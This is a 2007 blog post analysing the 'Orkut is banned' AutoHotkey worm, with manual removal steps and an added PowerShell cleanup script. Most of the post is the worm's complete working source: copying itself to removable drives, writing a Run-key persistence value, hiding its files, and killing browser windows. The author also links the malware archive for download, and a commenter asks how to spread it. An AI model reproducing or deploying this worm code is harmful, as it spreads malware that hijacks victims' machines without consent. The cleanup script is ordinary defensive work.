Me and My Muse

Thursday, July 19, 2007

Orkut is banned you fool - Virus Update

A sudden laugh hit me last afternoon which said, "ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!" Same was the case with YouTube.

A mindless chuckle told me it's just another innovation from a budding pop-hungry genius, but the price is the severe spread. How could it have come to me, pretty nasty.. anyways ..

So here's the gig:
> 1. Go to the Task manager
> 2. Click on the "Application" Tab (if it's not)
> 3. Right Click on the application that's Giving you the Message > go to the Process.
> 4. As you can see there is "svchost.exe" Highlighted.
> 5. Right Click and Select "End Process Tree"

I loitered a bit and found a new directory in my C: drive
Directory - C:\heap41a
Files - svchost.exe, drivelist.txt, 2.mp3, Icon.ico, offspring, reproduce.txt, std.txt, script1.txt

To make it more interesting the kid had made the folder invisible even when we choose to see all hidden files.

I choose to show the script much to the comfort of the writer ...
"You are good kid, real good, but as long as I am around, you will always be second best"
- Stanley Ipkiss


offspring:
    #notrayicon
    #persistent
    ArrayCount = 0
    Loop, Read,C:\heap41a\driveList.txt
    {
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
    }
    dat1=%userprofile%
    settimer,reproduce,5000
    return

    reproduce:

    Loop %ArrayCount%
    {

    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
    {
    driveget,data1,status,%element%:\
    ifequal,data1,Ready
    {
    FileCopydir,C:\heap41a\offspring,%element%:\,1

    }

    }
    }
    regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
    ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
    Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
    return

script:
    #persistent
    #notrayicon
    settimer,ban,2000
    return

    WinGetActiveTitle, ed
    ifinstring,ed,orkut
    {
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ifinstring,ed,youtube
    {
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ifinstring,ed,Mozilla Firefox
    {
    winclose %ed%
    msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
    return
    }
    ifwinactive ahk_class IEFrame
    {

    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }

    }
    return

std:
    #notrayicon
    #singleinstance,ignore
    regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
    ifnotequal,regdata,0
    regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
    Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
    Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

drivelist:
    c
    d
    e
    f
    g
    h
    i
    j
    k
    l
    m
    n
    o
    p
    q
    r
    s
    t
    u
    v
    w
    x
    y
    z


The rest of the files are junk; just delete them to break free (or, if you are like me, rar and preserve them for later use. It installs easily :P)
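The cleanup implied by the listings above, as an added example that is not part of the original post: it stops the copies of svchost.exe running from the drop folder, removes the autorun value, restores the hidden-files setting, and reports what is left. It assumes an elevated PowerShell 3.0 or later session; the folder, key and value names are the ones shown in the scripts.

```powershell
# Added example, not from the original post. Run in an elevated PowerShell.
# Folder, key and value names come from the listings above.
$dropDir = 'C:\heap41a'
$runKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run'
$showAll = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'

# 1. Stop every svchost.exe started from the drop folder first. The reproduce
#    script rewrites the Run value on a 5000 ms timer, so registry cleanup done
#    while it is still running is undone. The genuine svchost.exe runs from
#    %SystemRoot%\System32 and is not matched by this path filter.
Get-CimInstance Win32_Process -Filter "Name = 'svchost.exe'" |
    Where-Object { $_.ExecutablePath -like "$dropDir\*" } |
    ForEach-Object {
        Write-Host "Stopping PID $($_.ProcessId): $($_.CommandLine)"
        Stop-Process -Id $_.ProcessId -Force
    }

# 2. Remove the 'winlogon' autorun value if it points into the drop folder.
$run = Get-ItemProperty -Path $runKey -Name winlogon -ErrorAction SilentlyContinue
if ($run -and $run.winlogon -like "$dropDir\*") {
    Write-Host "Removing Run value: $($run.winlogon)"
    Remove-ItemProperty -Path $runKey -Name winlogon
}

# 3. std sets CheckedValue to 0, which is why "show hidden files" stops
#    working. 1 is the Windows default for SHOWALL.
$cv = Get-ItemProperty -Path $showAll -Name CheckedValue -ErrorAction SilentlyContinue
if ($cv -and $cv.CheckedValue -ne 1) {
    Write-Host "Restoring SHOWALL\CheckedValue from $($cv.CheckedValue) to 1"
    Set-ItemProperty -Path $showAll -Name CheckedValue -Value 1 -Type DWord
}

# 4. The reproduce script copies the contents of $dropDir\offspring to the root
#    of each ready removable drive. Report root entries with the same names.
$payload = Get-ChildItem -Path "$dropDir\offspring" -Force -ErrorAction SilentlyContinue
foreach ($disk in Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2') {
    foreach ($item in $payload) {
        $copy = Join-Path "$($disk.DeviceID)\" $item.Name
        if (Test-Path -LiteralPath $copy) { Write-Host "Copied payload found: $copy" }
    }
}

# 5. Report the drop folder; -Force is needed to list hidden items.
if (Test-Path -LiteralPath $dropDir) {
    Get-ChildItem -Path $dropDir -Force | Select-Object Name, Length, LastWriteTime
}
```

Nothing is deleted from disk by this script; once the report has been reviewed, the drop folder and any reported copies on removable drives can be removed by hand.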

Download the rar from here (just for info)


-Arnab
http://arnabpal.blogspot.com/


2 Comments:

Blogger chanky said...

thnx for the info

Monday, September 03, 2007 3:16:00 PM  
Anonymous Anonymous said...

hi i tried that muhaaa virus. but its not working. how we can send it by uploading on website? plz let me know. kiranraj.kevin@gmail.com

Saturday, April 11, 2009 7:38:00 PM  
